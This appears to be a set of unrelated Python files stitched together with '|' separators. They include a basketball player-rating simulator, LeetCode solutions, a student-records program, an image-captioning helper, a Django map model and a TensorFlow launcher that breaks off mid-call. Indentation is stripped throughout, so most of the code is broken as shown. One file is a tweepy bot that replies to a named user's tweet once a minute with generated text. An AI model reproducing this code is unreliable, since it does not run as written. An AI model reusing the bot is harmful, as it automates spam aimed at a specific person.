self.rebounding = rebounding
self.ball_handling = ball_handling
self.passing = passing
self.post_control = post_control
self.lowpost_strong = lowpost_strong
self.lowpost_finesse = lowpost_finesse
self.highpost_finesse = highpost_finesse
self.athleticism = athleticism
#Status
self.years_pro = years_pro
def player_ager(self):
self.vitals['Age'] +=1
self.years_pro +=1
def teen_grower(self):
growth_end_age = 20
#define growth rates
potential_mental_growthRate = 0.33 * (self.traits['talent']*0.01)
actual_mental_growthRate = potential_mental_growthRate * random.uniform((self.traits['training discipline (mental)']*0.01),1)
potential_physical_growthRate = 0.09 * (self.traits['physical hardiness']*0.01)
actual_physical_growthRate = potential_physical_growthRate * random.uniform((self.traits['training discipline (physical)']*0.01),1)
#apply growth
#if self.vitals['age'] <= growth_end_age:
# self.skill_IQ['offensive awareness'] += (99 - self.skill_IQ['offensive awareness'])* (actual_mental_growthRate)
# self.skill_athleticism['strength'] += (99 - self.skill_athleticism['strength']) * (actual_physical_growthRate)
#if self..vitals['position'] == 'PF' or 'C':
# self.skill_IQ['screen setting'] += (99 - self.skill_IQ['screen setting']) * (actual_mental_growthRate)
#elif self.position == 'PG' or 'SG':
# self.skill_IQ['screen using'] += (99 - self.skill_IQ['screen using']) * (actual_mental_growthRate)
#else:
# False
#else:
# False
#def early20s_grower(self):
# growth_end_age = 25
#
# #define growth rates
# potential_mental_growthRate = 0.33 * (self.traits['talent']*0.01)
# actual_mental_growthRate = potential_mental_growthRate * (self.traits['mental discipline']*0.01)
# 1.2 --Create Instances of Player--
# 1.2.1 --Define attributes--
def vital_function(name, age, position):
return {'Name': name, 'Age':age, 'Position': position}
def measurement_function(height, weight, wingspan):
return {'Height (inches)': height, 'Weight':weight, 'Wingspan': wingspan}
def trait_function(talent, drive, mental_disc, phys_hard, phys_disc):
return {'talent': talent, 'drive': drive, 'training discipline (mental)': mental_disc, 'physical hardiness': phys_hard, 'training discipline (physical)': phys_disc}
def threepoint_scoring_function(open_3, offdribble_3, contested_3):
return {'Open shot 3pt': open_3, 'Off dribble shot 3pt': offdribble_3, 'Contested shot 3pt': contested_3}
def midrange_scoring_function(open_mid, offdribble_mid, contested_mid):
return {'Open shot midrange': open_mid, 'Off dribble shot midrange': offdribble_mid, 'Contested shot midrange': contested_mid}
def closerange_scoring_function(open_close, offdribble_close, contested_close):
return {'Open shot closerange': open_close, 'Off dribble shot closerange': offdribble_close, 'Contested shot closerange': contested_close}
def scoring_instincts_function(shot_IQ, draw_foul, off_consistency):
return {'Shot IQ': shot_IQ, 'Draw foul':draw_foul, 'Offensive consistency': off_consistency}
def free_throw_function(free_throw):
return {'Free throw': free_throw}
def driving_finesse_function(driving_layup):
return {'Driving layup': driving_layup}
def driving_strong_function(driving_dunk):
return {'Driving dunk': driving_dunk}
def onballD_perimeter_function(onball_D, lat_quick):
return {'On ball defense IQ': onball_D, 'Lateral quickness': lat_quick}
def onballD_post_function(post_D):
return {'Post defense': post_D}
def team_defense_function(PnR_def_IQ, help_def_IQ, def_consistency):
return {'Pick and roll defense IQ': PnR_def_IQ, 'Help defense IQ': help_def_IQ, 'Defensive consistency': def_consistency}
def stealing_function(steal, pass_percept, rxn_time):
return {'Steal': steal, 'Pass perception': pass_percept, 'Reaction time': rxn_time}
def shot_defense_function(shot_contest):
return {'Shot contest': shot_contest}
def shot_blocking_function(shot_block):
return {'Shot blocking': shot_block}
def rebounding_function(off_reb, def_reb, boxout):
return {'Offensive rebound': off_reb, 'Defensive rebound': def_reb, 'Boxout': boxout}
def ball_handling_function(ball_control, speed_w_ball):
return {'Ball control': ball_control, 'Speed with ball': speed_w_ball}
def passing_function(pass_accuracy, pass_IQ, pass_vision):
return {'Pass accuracy': pass_accuracy, 'Passing IQ': pass_IQ, 'Passing vision': pass_vision}
def post_control_function(post_control, hands):
return {'Post control': post_control, 'Hands': hands}
def lowpost_strong_function(stand_dunk, contact_dunk):
return {'Standing dunk': stand_dunk, 'Contact dunk':contact_dunk}
def lowpost_finesse_function(stand_layup, hook):
return {'Standing layup': stand_layup, 'Post hook': hook}
def highpost_finesse_function(post_fade):
return {'Post fadeaway':post_fade}
def athleticism_function(speed, accel, vert, strength, stamina, hustle, durability):
return {'Speed': speed, 'Acceleration': accel, 'Vertical': vert, 'Strength': strength, 'Stamina':stamina, 'Hustle': hustle, 'Durability': durability}
# 1.2.2 --Create players--
#Take user inputs
vital_input_name = input('Enter your player\'s name: ')
vital_input_age = input('Enter your player\'s age: ')
vital_input_position = input('Enter your player\'s position: ')
measurement_input_height = input('Enter your player\'s height: ')
measurement_input_weight = input('Enter your player\'s weight: ')
measurement_input_wingspan = input('Enter your player\'s wingspan: ')
trait_input_talent = input('Enter your player\'s talent: ')
trait_input_drive = input('Enter your player\'s drive: ')
trait_input_mentalDiscipline = input('Enter your player\'s training discipline (mental): ')
trait_input_physHard = input('Enter your player\'s physical hardiness: ')
trait_input_physDisc = input('Enter your player\'s training discipline (physical): ')
threepoint_input_scoring_open = input('Enter your player\'s Open Shot 3pt rating: ')
threepoint_input_scoring_offDribble = input('Enter your player\'s Off-dribble Shot 3pt rating: ')
threepoint_input_scoring_contested = input('Enter your player\'s Contested Shot 3pt rating: ')
midrange_input_scoring_open = input('Enter your player\'s Open Shot Midrange rating: ')
midrange_input_scoring_offDribble = input('Enter your player\'s Off-dribble Shot Midrange rating: ')
midrange_input_scoring_contested = input('Enter your player\'s Contested Shot Midrange rating: ')
close_input_scoring_open = input('Enter your player\'s Open Shot Close rating: ')
close_input_scoring_offDribble = input('Enter your player\'s Off-dribble Shot Close rating: ')
close_input_scoring_contested = input('Enter your player\'s Contested Shot Close rating: ')
scoring_instincts_input_shotIQ = input('Enter your player\'s Shot IQ rating: ')
scoring_instincts_input_drawFoul = input('Enter your player\'s draw foul rating: ')
scoring_instincts_input_offconsistency = input ('Enter your player\'s offensive consistency rating: ')
free_throw_input = input('Enter your player\'s free throw rating: ')
driving_finesse_input_drivinglayup = input('Enter your player\'s driving layup rating: ')
driving_strong_input_drivedunk = input('Enter your player\'s driving dunk rating: ')
onballD_perimeter_input_IQ = input('Enter your player\'s on ball defense IQ rating: ')
onballD_perimeter_input_latquick = input('Enter your player\'s lateral quickness rating: ')
onballD_post_input = input('Enter your player\'s post defense rating: ')
team_defense_input_PnR = input('Enter your player\'s pick and roll defense IQ rating: ')
team_defense_input_help = input('Enter your player\'s help defense IQ rating: ')
team_defense_input_consist = input('Enter your player\'s defensive consistency rating: ')
steal_input_stl = input('Enter your player\'s steal rating: ')
steal_input_passPercept = input('Enter your player\'s pass perception rating: ')
steal_input_rxn = input('Enter your player\'s reaction time rating: ')
shotContest_input = input('Enter your player\'s shot contest rating: ')
shotBlock_input = input('Enter your player\'s shot block rating: ')
rebounding_input_off = input('Enter your player\'s offensive rebounding rating: ')
rebounding_input_def = input('Enter your player\'s defensive rebounding rating: ')
rebounding_input_box = input('Enter your player\'s boxout rating: ')
ball_handling_input_control = input('Enter your player\'s ball control rating: ')
ball_handling_input_speed = input('Enter your player\'s speed with ball rating: ')
passing_input_accuracy = input('Enter your player\'s passing accuracy rating: ')
passing_input_IQ = input('Enter your player\'s passing IQ rating: ')
passing_input_vision = input('Enter your player\'s passing vision rating: ')
post_input_control = input('Enter your player\'s post control rating: ')
post_input_hands = input('Enter your player\'s hands rating: ')
lowpost_strong_input_standDunk = input('Enter your player\'s standing dunk rating: ')
lowpost_strong_input_contactDunk = input('Enter your player\'s contact dunk rating: ')
lowpost_finesse_input_standLayup = input('Enter your player\'s standing layup rating: ')
lowpost_finesse_input_hook = input('Enter your player\'s post hook rating: ')
highpost_finesse_input_fade = input('Enter your player\'s post fadeaway rating: ')
athleticism_input_speed = input('Enter your player\'s speed rating: ')
athleticism_input_accel = input('Enter your player\'s acceleration rating: ')
athleticism_input_vertical = input('Enter your player\'s vertical rating: ')
athleticism_input_strength = input('Enter your player\'s strength rating: ')
athleticism_input_stamina = input('Enter your player\'s stamina rating: ')
athleticism_input_hustle = input('Enter your player\'s hustle rating: ')
athleticism_input_durable = input('Enter your player\'s durability rating: ')
#Create player
player1 = Player(vital_function(vital_input_name, vital_input_age, vital_input_position),
measurement_function(measurement_input_height, measurement_input_weight, measurement_input_wingspan),
trait_function(trait_input_talent, trait_input_drive, trait_input_mentalDiscipline,trait_input_physHard,trait_input_physDisc),
threepoint_scoring_function(threepoint_input_scoring_open, threepoint_input_scoring_offDribble, threepoint_input_scoring_contested),
midrange_scoring_function(midrange_input_scoring_open, midrange_input_scoring_offDribble, midrange_input_scoring_contested),
closerange_scoring_function(close_input_scoring_open, close_input_scoring_offDribble, close_input_scoring_contested),
scoring_instincts_function(scoring_instincts_input_shotIQ, scoring_instincts_input_drawFoul, scoring_instincts_input_offconsistency),
free_throw_function(free_throw_input), driving_finesse_function(driving_finesse_input_drivinglayup),
driving_strong_function(driving_strong_input_drivedunk), onballD_perimeter_function(onballD_perimeter_input_IQ, onballD_perimeter_input_latquick),
onballD_post_function(onballD_post_input), team_defense_function(team_defense_input_PnR, team_defense_input_help, team_defense_input_consist),
stealing_function(steal_input_stl, steal_input_passPercept, steal_input_rxn), shot_defense_function(shotContest_input),
shot_blocking_function(shotBlock_input), rebounding_function(rebounding_input_off,rebounding_input_def, rebounding_input_box),
ball_handling_function(ball_handling_input_control, ball_handling_input_speed), passing_function(passing_input_accuracy, passing_input_IQ, passing_input_vision),
post_control_function(post_input_control, post_input_hands), lowpost_strong_function(lowpost_strong_input_standDunk, lowpost_strong_input_contactDunk),
lowpost_finesse_function(lowpost_finesse_input_standLayup, lowpost_finesse_input_hook), highpost_finesse_function(highpost_finesse_input_fade),
athleticism_function(athleticism_input_speed, athleticism_input_accel, athleticism_input_vertical, athleticism_input_strength, athleticism_input_stamina, athleticism_input_hustle, athleticism_input_durable),0
)
#2.---SIMULATE SEASONS---
#print(f'On draft day {player1.vitals['Name']} is {player1.age} years old, and his skill of offensive awareness is ' + str(int((player1.skill_IQ['offensive awareness']))))
print('On draft day ' + str({player1.vitals['Name']}) + ' exists. He has ' + str({player1.shot_blocking['Shot blocking']}) + 'block rating.')
season = 0
printcounter = 0
while season <=10:
if printcounter == 1:
# print(f'After season {season}, {player1.vitals['Name']} is {player1.age} years old, and his skill of offensive awareness is ' + str(int((player1.skill_IQ['offensive awareness']))))
print('player age: ' + str(player1.vitals['Age']))
printcounter = 0
#player1.player_ager()
#player1.teen_grower()
printcounter+=1
season+=1
|
#longitud25
cadena ="La única discapacidad en la vida es una mala actitud"
msg ="la longitud del tex es {}"
tex = cadena[19:-21]
print(msg.format(len(tex)))
|
# -- coding: utf-8 --
name = 'Yay Shin'
age = 19 # not a lie
height = 64 # inches
weight = 110 # lbs
eyes = 'Brown'
teeth = 'White'
hair = 'Brown'
print "Let's talk about %s." % name
print "She's %d inches tall." % height
print "She's %d pounds heavy." % weight
print "Actually that's not too heavy."
print "She's got %s eyes and %s hair." % (eyes, hair)
print "His teeth are usually %s depending on the coffee." % teeth
# this line is tricky, try to get it exactly right
print "If I add %d, %d, and %d I get %d." % (
age, height, weight, age + height + weight) |
deep_learning = [
"('deep', 'learn')",
"kera",
"('neural', 'network')",
"tensorflow",
]
machine_learning = [
"classif",
"cluster",
"ensembl",
"('gradient', 'boost')",
"graph",
"knn",
"machin",
"model",
"('mont', 'carlo')",
"('natur', 'languag')",
"('parallel', 'process')",
"('random', 'forest')",
"sentiment",
"spark",
"supervis",
"('text', 'mine')",
"tree",
"unsupervis",
]
analytics = [
"analysi",
"anova",
"arima",
"('analyz', 'data')",
"covari",
"bayesian",
"dataanalyt",
"('databas', 'manag')",
"eigenvalu",
"eigenvector" "heteroscedast",
"('linear', 'regress')",
"logist",
"multicollinear",
"multivari",
"mysql",
"nosql",
"('odd', 'ratio')",
"outlier",
"precis",
"('princip', 'compon')",
"python",
"r",
"recal",
"regress",
"sensit",
"specif",
"('stochast', 'model')",
"tableau",
"('time', 'seri')",
]
management = ["busi", "('busi', 'analyt')", "leadership", "manag", "strateg"]
|
# [Classic, Coloring-Bipartition]
# https://leetcode.com/problems/is-graph-bipartite/
# 785. Is Graph Bipartite?
# History:
# Facebook
# 1.
# Mar 19, 2020
# 2.
# May 8, 2020
# Given an undirected graph, return true if and only if it is bipartite.
#
# Recall that a graph is bipartite if we can split it's set of nodes into two independent subsets
# A and B such that every edge in the graph has one node in A and another node in B.
#
# The graph is given in the following form: graph[i] is a list of indexes j for which the edge
# between nodes i and j exists. Each node is an integer between 0 and graph.length - 1. There
# are no self edges or parallel edges: graph[i] does not contain i, and it doesn't contain any
# element twice.
#
# Example 1:
# Input: [[1,3], [0,2], [1,3], [0,2]]
# Output: true
# Explanation:
# The graph looks like this:
# 0----1
# | |
# | |
# 3----2
# We can divide the vertices into two groups: {0, 2} and {1, 3}.
# Example 2:
# Input: [[1,2,3], [0,2], [0,1,3], [0,2]]
# Output: false
# Explanation:
# The graph looks like this:
# 0----1
# | \ |
# | \ |
# 3----2
# We cannot find a way to divide the set of nodes into two independent subsets.
#
#
# Note:
#
# graph will have length in range [1, 100].
# graph[i] will contain integers in range [0, graph.length - 1].
# graph[i] will not contain i or duplicate values.
# The graph is undirected: if any element j is in graph[i], then i will be in graph[j].
class Solution(object):
def _dfs(self, node, color, graph, colors):
if node in colors:
return colors[node] == color
colors[node] = color
for nei in graph[node]:
if not self._dfs(nei, color ^ 1, graph, colors):
return False
return True
def isBipartite(self, graph):
"""
:type graph: List[List[int]]
:rtype: bool
"""
colors = {}
for node in range(len(graph)):
if node not in colors:
if not self._dfs(node, 0, graph, colors):
return False
return True
|
# -*- coding: utf-8 -*-
# 时间 : 2018/10/14 22:36
# 作者 : xcl
#属性变换
import pandas as pd
#参数初始化
discfile = 'C:\\Users\\Administrator\\Desktop\\DiskCapacityPrediction\\data\\discdata.xls' #磁盘原始数据
transformeddata = 'C:\\Users\\Administrator\\Desktop\\discdata_processed.xls' #变换后的数据
data = pd.read_excel(discfile)
data = data[data['TARGET_ID'] == 184].copy() #只保留TARGET_ID为184的数据
data_group = data.groupby('COLLECTTIME') #以时间分组
def attr_trans(x): #定义属性变换函数
result = pd.Series(index = ['SYS_NAME', 'CWXT_DB:184:C:\\', 'CWXT_DB:184:D:\\', 'COLLECTTIME'])
result['SYS_NAME'] = x['SYS_NAME'].iloc[0]
result['COLLECTTIME'] = x['COLLECTTIME'].iloc[0]
result['CWXT_DB:184:C:\\'] = x['VALUE'].iloc[0]
result['CWXT_DB:184:D:\\'] = x['VALUE'].iloc[1]
return result
data_processed = data_group.apply(attr_trans) #逐组处理
data_processed.to_excel(transformeddata, index = False) |
import sys
sys.path.append("/home/whyjay/caffe/python")
sys.path.append("/usr/lib/python2.7/dist-packages/")
import cv2
import numpy as np
import skimage
from IPython import embed
def crop_image(x, target_height=227, target_width=227):
image = skimage.img_as_float(skimage.io.imread(x)).astype(np.float32)
if len(image.shape) == 2:
image = np.tile(image[:,:,None], 3)
elif len(image.shape) == 4:
image = image[:,:,:,0]
height, width, rgb = image.shape
if width == height:
resized_image = cv2.resize(image, (target_height, target_width))
elif height < width:
resized_image = cv2.resize(
image,
(int(width * float(target_height)/height), target_width))
cropping_length = int((resized_image.shape[1] - target_height) / 2)
resized_image = resized_image[:,cropping_length:resized_image.shape[1] - cropping_length]
else:
resized_image = cv2.resize(
image,
(target_height, int(height * float(target_width)/width)))
cropping_length = int((resized_image.shape[0] - target_width) / 2)
resized_image = resized_image[cropping_length:resized_image.shape[0] - cropping_length,:]
return cv2.resize(resized_image, (target_height, target_width))
def build_word_vocab(sentence_iterator, word_count_threshold=10): # borrowed this function from NeuralTalk
print 'preprocessing word counts and creating vocab based on word count threshold %d' % (word_count_threshold, )
word_counts = {}
nsents = 0
for sent in sentence_iterator:
nsents += 1
for w in sent.lower().split(' '):
word_counts[w] = word_counts.get(w, 0) + 1
vocab = [w for w in word_counts if word_counts[w] >= word_count_threshold]
print 'filtered words from %d to %d' % (len(word_counts), len(vocab))
ixtoword = {}
ixtoword[0] = '.' # period at the end of the sentence. make first dimension be end token
wordtoix = {}
wordtoix['#START#'] = 0 # make first vector be the start token
ix = 1
for w in vocab:
wordtoix[w] = ix
ixtoword[ix] = w
ix += 1
word_counts['.'] = nsents
bias_init_vector = np.array([1.0*word_counts[ixtoword[i]] for i in ixtoword])
bias_init_vector /= np.sum(bias_init_vector) # normalize to frequencies
bias_init_vector = np.log(bias_init_vector)
bias_init_vector -= np.max(bias_init_vector) # shift to nice numeric range
return wordtoix, ixtoword, bias_init_vector
def shuffle_block_df(df):
index = list(df.index)
block_idx = range(len(index)/5)
np.random.shuffle(block_idx)
new_index = []
for b in block_idx:
new_index += index[5*b : 5*(b+1)]
df = df.ix[new_index]
return df.reset_index(drop=True)
def shuffle_df(df):
index = list(df.index)
np.random.shuffle(index)
df = df.ix[index]
return df.reset_index(drop=True)
def prep_cocoeval_flickr(ann_df, res_df):
pass
# ann_df uniq image images
#ann = {'images':None, 'info':'', 'type':'captions', 'annotations':None}
#ann_caps = {'caption':"afjiwel", 'id':1, 'image_id':2}
#ann_images = {'id':2}
#res = [{'caption':'hello', 'image_id':2}, {}]
# return metric
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class TiebaBnItem(scrapy.Item):
keyword = scrapy.Field()
url = scrapy.Field()
title = scrapy.Field()
tz_id = scrapy.Field()
source = scrapy.Field()
author = scrapy.Field()
create_time_dt = scrapy.Field()
create_time_ts = scrapy.Field()
content = scrapy.Field()
image_url = scrapy.Field()
gender = scrapy.Field()
reply = scrapy.Field()
update_dt = scrapy.Field()
update_ts = scrapy.Field()
project = scrapy.Field()
bar_name = scrapy.Field()
|
C1, C2, C3, C4 = input().split(" ")
if int(C1) == 1:
print(1)
elif int(C2) == 1:
print(2)
elif int(C3) == 1:
print(3)
else:
print(4) |
# -*- coding: UTF-8 -*-
# https://blog.csdn.net/tian_123456789/article/details/78914692
import os
import re
import numpy as np
class Student: #定义一个学生类
def __init__(self):
self.name = ''
self.ID =''
self.score1 = 0
self.score2 = 0
self.score3 = 0
self.sum = 0
def searchByID(stulist, ID): #按学号查找看是否学号已经存在
for item in stulist:
if item.ID == ID:
return True
def Add(stulist,stu): #添加一个学生信息
if searchByID(stulist, stu.ID) == True:
print("学号已经存在!")
return False
stulist.append(stu)
print (stu.name,stu.ID, stu.score1, stu.score2, stu.score3, stu.sum)
print ("是否要保存学生信息?")
nChoose = input("Choose Y/N")
if nChoose == 'Y' or nChoose == 'y':
file_object = open("students.txt", "a")
file_object.write(stu.ID)
file_object.write(" ")
file_object.write(stu.name)
file_object.write(" ")
file_object.write(str(stu.score1))
file_object.write(" ")
file_object.write(str(stu.score2))
file_object.write(" ")
file_object.write(str(stu.score3))
file_object.write(" ")
file_object.write(str(stu.sum))
file_object.write("\n")
file_object.close()
print (u"保存成功!")
def Search(stulist, ID): #搜索一个学生信息
print (u"学号 姓名 语文 数学 英语 总分")
count = 0
for item in stulist:
if item.ID == ID:
print (item.ID, '\t' ,item.name,'\t', item.score1,'\t',item.score2, '\t', item.score3, '\t',item.sum)
break
count = 0
if count == len(stulist):
print ("没有该学生学号!")
def Del(stulist, ID): #删除一个学生信息
count = 0
for item in stulist:
if item.ID == ID:
stulist.remove(item)
print ("删除成功!")
break
count +=1
# if count == len(stulist):
# print "没有该学生学号!"
file_object = open("students.txt", "w")
for stu in stulist:
print (stu.ID, stu.name, stu.score1,stu.score2, stu.score3, stu.sum)
file_object.write(stu.ID)
file_object.write(" ")
file_object.write(stu.name)
file_object.write(" ")
file_object.write(str(stu.score1))
file_object.write(" ")
file_object.write(str(stu.score2))
file_object.write(" ")
file_object.write(str(stu.score3))
file_object.write(" ")
file_object.write(str(stu.sum))
file_object.write("\n")
file_object.close()
# print "保存成功!"
file_object.close()
def Change(stulist, ID):
count = 0
for item in stulist:
if item.ID == ID:
stulist.remove(item)
file_object = open("students.txt", "w")
for stu in stulist:
#print li.ID, li.name, li.score
file_object.write(stu.ID)
file_object.write(" ")
file_object.write(stu.name)
file_object.write(" ")
file_object.write(str(stu.score1))
file_object.write(" ")
file_object.write(str(stu.score2))
file_object.write(" ")
file_object.write(str(stu.score3))
file_object.write(" ")
file_object.write(str(stu.sum))
file_object.write("\n")
# print "保存成功!"
file_object.close()
stu = Student()
stu.name = input("请输入学生的姓名")
while True:
stu.ID = input("请输入学生的ID")
p = re.compile('^[0-9]{3}$')
if p.match(stu.ID):
break
else:
print ("输入的有错误!")
while True:
stu.score1 = int(input("请输入学生语文成绩"))
if stu.score1 <= 100 and stu.score1 > 0 :
break
else:
print ("输入的学生成绩有错误!")
while True:
stu.score2 = int(input("请输入学生数学成绩"))
if stu.score2 <= 100 and stu.score2 > 0 :
break
else:
print ("输入的学生成绩有错误!")
while True:
stu.score3 = int(input("请输入学生英语成绩"))
if stu.score3 <= 100 and stu.score3 > 0 :
break
else:
print ("输入的学生成绩有错误!")
stu.sum = stu.score1 + stu.score2 + stu.score3
Add(stulist,stu)
def display(stulist): #显示所有学生信息
print (u"学号 姓名 语文 数学 英语 总分")
for item in stulist:
print (item.ID, '\t' ,item.name,'\t', item.score1,'\t',item.score2, '\t', item.score3, '\t',item.sum)
def Sort(stulist): #按学生成绩排序
Stu = []
sum_count = []
for li in stulist:
temp = []
temp.append(li.ID)
temp.append(li.name)
temp.append(int(li.score1))
temp.append(int(li.score2))
temp.append(int(li.score3))
temp.append(int(li.sum))
sum_count.append(int(li.sum))
Stu.append(temp)
#print sum_count
#print Stu;
#print stulist
insertSort(sum_count, stulist)
#print stulist;
display(stulist)
def insertSort(a, stulist):
for i in range(len(a)-1):
#print a,i
for j in range(i+1,len(a)):
if a[i]<a[j]:
temp = stulist[i]
stulist[i] = stulist[j]
stulist[j] = temp
#return a
def Init(stulist): #初始化函数
print ("初始化......")
file_object = open('students.txt', 'r')
for line in file_object:
stu = Student()
line = line.strip("\n")
s = line.split(" ")
stu.ID = s[0]
stu.name = s[1]
stu.score1 = s[2]
stu.score2 = s[3]
stu.score3 = s[4]
stu.sum = s[5]
stulist.append(stu)
file_object.close()
print ("初始化成功!")
main()
def main(): #主函数 该程序的入口函数
while True:
print ("*********************")
print (u"--------菜单---------")
print (u"增加学生信息--------1")
print (u"查找学生信息--------2")
print (u"删除学生信息--------3")
print (u"修改学生信息--------4")
print (u"所有学生信息--------5")
print (u"按照分数排序--------6")
print (u"退出程序------------0")
print ("*********************")
nChoose = input("请输入你的选择:")
if nChoose == "1":
stu = Student()
stu.name = input("请输入学生的姓名")
while True:
stu.ID = input("请输入学生的ID")
p = re.compile('^[0-9]{3}$')
if p.match(stu.ID):
break
else:
print ("输入的有错误!")
while True:
stu.score1 = int(input("请输入学生语文成绩"))
if stu.score1 <= 100 and stu.score1 > 0 :
break
else:
print ("输入的学生成绩有错误!")
while True:
stu.score2 = int(input("请输入学生数学成绩"))
if stu.score2 <= 100 and stu.score2 > 0 :
break
else:
print ("输入的学生成绩有错误!")
while True:
stu.score3 = int(input("请输入学生英语成绩"))
if stu.score3 <= 100 and stu.score3 > 0 :
break
else:
print ("输入的学生成绩有错误!")
stu.sum = stu.score1 + stu.score2 + stu.score3
Add(stulist,stu)
if nChoose == '2':
ID = input("请输入学生的ID")
Search(stulist, ID)
if nChoose == '3':
ID = input("请输入学生的ID")
Del(stulist, ID)
if nChoose == '4':
ID = input("请输入学生的ID")
Change(stulist, ID)
if nChoose == '5':
display(stulist)
if nChoose == '6':
Sort(stulist)
if nChoose == '0':
break
if __name__ == '__main__':
stulist =[]
Init(stulist) |
import numpy as np
import matplotlib.pylab as pl
x = np.loadtxt('./data/x.txt')
y = np.loadtxt('./data/y.txt')
p = np.loadtxt('./data/p.txt')
print(sum(p))
pl.figure(figsize=(10.,10.), dpi=1000)
pl.xlim((300,500))
pl.ylim((250,450))
pl.tricontourf(x,y,p, 300,cmap='hot')
#pl.tricontour(x,y,p, 300,cmap='hot')
#pl.scatter(x,y,c=p, cmap = 'hot')
pl.colorbar()
pl.savefig('TW.png') |
import time
import schedule
import tweepy
from argparse import ArgumentParser
from src.generator import Generator
import logging
from logging import getLogger
from src.log import init_logging
init_logging(level = logging.INFO)
logger = getLogger(__name__)
def gen_api(CK, CS, AK, AS):
auth = tweepy.OAuthHandler(CK, CS)
auth.set_access_token(AK, AS)
api = tweepy.API(auth)
return api
def jan_lisa(api, gen):
user = 'LeeKaixin2003'
tweet_id = 1394936576078090244
try:
x = gen.generate()
x = '@{} {}'.format(user, x)
api.update_status(
status = x,
in_reply_to_status_id = tweet_id)
logger.info('tweeted: {}'.format(x))
except Exception as e:
logger.info('failed:', e)
def main():
parser = ArgumentParser()
parser.add_argument('--consumer-key')
parser.add_argument('--consumer-secret')
parser.add_argument('--api-key')
parser.add_argument('--api-secret')
args = parser.parse_args()
api = gen_api(
CK = args.consumer_key,
CS = args.consumer_secret,
AK = args.api_key,
AS = args.api_secret)
gen = Generator()
schedule.every().minute.at(':00').do(lambda : jan_lisa(api, gen))
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == '__main__':
main()
|
import os
import json
import requests
import zipfile
from django.db import models
from django.utils.functional import cached_property
import pygame
from common.models import ModelBase
from mapper import consts
pygame.mixer.init()
class Mapper(ModelBase):
# 取り込みデータ
id = models.CharField(verbose_name="Mapper ID", max_length=31, primary_key=True)
username = models.CharField(
verbose_name="ユーザー名", max_length=255, null=True
) # 後で自動取得
latest_uploaded = models.DateTimeField(
verbose_name="最終アップロード日", db_index=True, null=True
)
# 内部処理用
latest_processed = models.DateTimeField(
verbose_name="最終処理日", db_index=True, null=True
)
class Meta:
db_table = "mapper"
def update_latest_uploaded(self):
aggregated = self.map_set.aggregate(models.Max("uploaded"))
self.latest_uploaded = aggregated.get("uploaded__max")
self.save()
class Map(ModelBase):
id = models.CharField(verbose_name="Map ID", max_length=7, primary_key=True)
name = models.CharField(verbose_name="曲名", max_length=255)
uploaded = models.DateTimeField(verbose_name="アップロード日", db_index=True)
duration = models.FloatField(verbose_name="曲の長さ", default=0)
origin = models.TextField(verbose_name="オリジナルデータ")
downloaded = models.BooleanField("ダウンロード完了フラグ", default=False)
mapper = models.ForeignKey(Mapper, on_delete=models.CASCADE)
class Meta:
db_table = "map"
@property
def display_duration(self):
return "{}:{}".format(int(self.duration / 60), int(self.duration) % 60)
@property
def download_file_path(self):
return os.path.join(consts.DOWNLOAD_DIR, self.id + ".zip")
@property
def extract_path(self):
return os.path.join(consts.EXTRACT_DIR, self.id)
@property
def origin_data(self):
return json.loads(self.origin)
@property
def download_url(self):
return consts.BASE_URL + self.origin_data.get("directDownload")
@cached_property
def info_dat(self):
info_path = os.path.join(self.extract_path, "info.dat")
if not os.path.isfile(info_path):
return
with open(info_path, "r", encoding="utf-8") as fp:
dat = json.load(fp)
return dat
@cached_property
def music_file_duration(self):
song_file = os.path.join(self.extract_path, self.info_dat.get("_songFilename"))
song = pygame.mixer.Sound(song_file)
return song.get_length()
def download(self):
if self.downloaded:
return
response = requests.get(self.download_url, headers=consts.headers)
with open(self.download_file_path, "wb") as fp:
fp.write(response.content)
self.downloaded = True
self.save()
def extract_zip(self):
if not os.path.isfile(self.download_file_path):
raise FileNotFoundError()
if os.path.isdir(self.extract_path):
return
try:
os.makedirs(self.extract_path, 755, exist_ok=True)
with zipfile.ZipFile(self.download_file_path) as fp:
fp.extractall(self.extract_path)
except zipfile.BadZipFile as e:
os.rmdir(self.extract_path)
raise e
DIFFICULTY_CHOICES = (
(0, "Easy"),
(1, "Normal"),
(2, "Hard"),
(3, "Expert"),
(4, "ExpertPlus"),
)
DIFFICULTY_DICT = {t[1]: t[0] for t in DIFFICULTY_CHOICES}
class Difficulty(ModelBase):
map = models.ForeignKey(Map, on_delete=models.CASCADE, db_index=True)
code = models.IntegerField("難易度", choices=DIFFICULTY_CHOICES)
notes_count = models.IntegerField("ノーツ数")
notes_per_sec = models.FloatField("NPS", default=0.0)
speed = models.IntegerField(verbose_name="スピード")
obstacles = models.IntegerField(verbose_name="壁の数")
bombs = models.IntegerField(verbose_name="ボムの数")
distance_per_sec = models.FloatField("セイバーの移動距離", default=0.0)
class Meta:
db_table = "difficulty"
|
#https://leetcode.com/problems/power-of-three/
def isPowerOfThree(n):
if n < 1: return False
while n % 3 == 0:
n = n/3
return n == 1
def isPowerOfThree(n):
#check if log(n, 3) is an integer
return n > 0 and abs(math.log(n, 3) - round(math.log(n, 3))) < 1e-10
def isPowerOfThree(n):
return n > 0 and 1162261467 % n == 0
|
import os
def run(DATA_DIR, INCEPTION_CHECKPOINT, MODEL_DIR, TRAIN_STEPS, GPU_DEVICE = 0, VOCAB_FILE=""):
'''
:param DATA_DIR: str, Path to the directory containing TF Records files
:param INCEPTION_CHECKPOINT: str, Path to the directory containing the checkpoint file
:param MODEL_DIR: str, Path to directory saving or restoring model file
:param TRAIN_STEPS: int, Number of steps for the training
:param GPU_DEVICE: int, Index of the gpu device to use for the training
Run "from tensorflow.python.client import device_lib
device_lib.list_local_devices()"
:param VOCAB_FILE: str, Path to the directory containing vocabulary dictionary file
:return:
'''
# specify the path to library train.py
CODE_PATH = "../library"
DATA_DIR = os.path.abspath(DATA_DIR)
INCEPTION_CHECKPOINT = os.path.abspath(INCEPTION_CHECKPOINT)
MODEL_DIR = os.path.abspath(MODEL_DIR)
VOCAB_FILE = os.path.abspath(VOCAB_FILE)
if GPU_DEVICE == 0:
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = GPU_DEVICE
TRAIN_STEPS = str(TRAIN_STEPS)
# Run the training script.
os.system(
